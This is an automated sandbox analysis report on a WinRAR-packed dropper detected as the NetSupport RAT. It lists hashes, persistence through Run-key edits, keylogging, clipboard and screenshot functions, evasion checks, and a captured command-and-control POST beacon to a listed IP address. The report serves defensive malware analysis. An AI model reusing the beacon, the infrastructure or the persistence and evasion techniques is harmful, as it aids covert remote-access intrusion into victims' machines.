Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562378
MD5: a3cea314d888a08b79002656a9f4b927
SHA1: 396b9f96219785f0c80c69703dc623c23554affc
SHA256: 64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
Tags: exe, user-Bitsight

Detection

NetSupport RAT
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses cmd line tools excessively to alter registry or file data
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

AV Detection

Source: C:\Users\Public\Netstat\remcmdstub.exe ReversingLabs: Detection: 13%
Source: C:\Users\Public\Netstat\shv.exe ReversingLabs: Detection: 28%
Source: file.exe ReversingLabs: Detection: 39%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 97.9% probability
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary, 6_2_110AD570
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary, 9_2_110AD570
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\Public\Netstat\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF70E7940BC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7BFCA0 FindFirstFileExA, 0_2_00007FF70E7BFCA0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 6_2_11065890
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 6_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 6_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 6_2_1110AFD0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 9_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 9_2_11065890
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 9_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 9_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 9_2_1110AFD0

Networking

Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:49708 -> 45.61.128.74:443
Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 104.26.0.231
Source: Joe Sandbox View ASN Name: M247GB
Source: unknown TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown HTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 22 Host: 45.61.128.74 Connection: Keep-Alive CMD=POLL INFO=1 ACK=1 Data Raw: Data Ascii:
Source: file.exe, 00000000.00000003.2145215251.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2146640720.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144886227.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr String found in binary or memory: http://%s/fakeurl.htm
Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr String found in binary or memory: http://%s/testpage.htm
Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr String found in binary or memory: http://127.0.0.1
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: remcmdstub.exe.0.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: remcmdstub.exe.0.dr String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: remcmdstub.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: remcmdstub.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: remcmdstub.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspU
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspc
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspi
Source: remcmdstub.exe.0.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: remcmdstub.exe.0.dr String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: remcmdstub.exe.0.dr String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: remcmdstub.exe.0.dr String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: remcmdstub.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: http://s2.symcb.com0
Source: remcmdstub.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: remcmdstub.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: remcmdstub.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: remcmdstub.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: http://sv.symcd.com0&
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr String found in binary or memory: http://www.pci.co.uk/support
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: remcmdstub.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 6_2_1101F6B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData, 6_2_11032EE0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 9_2_1101F6B0
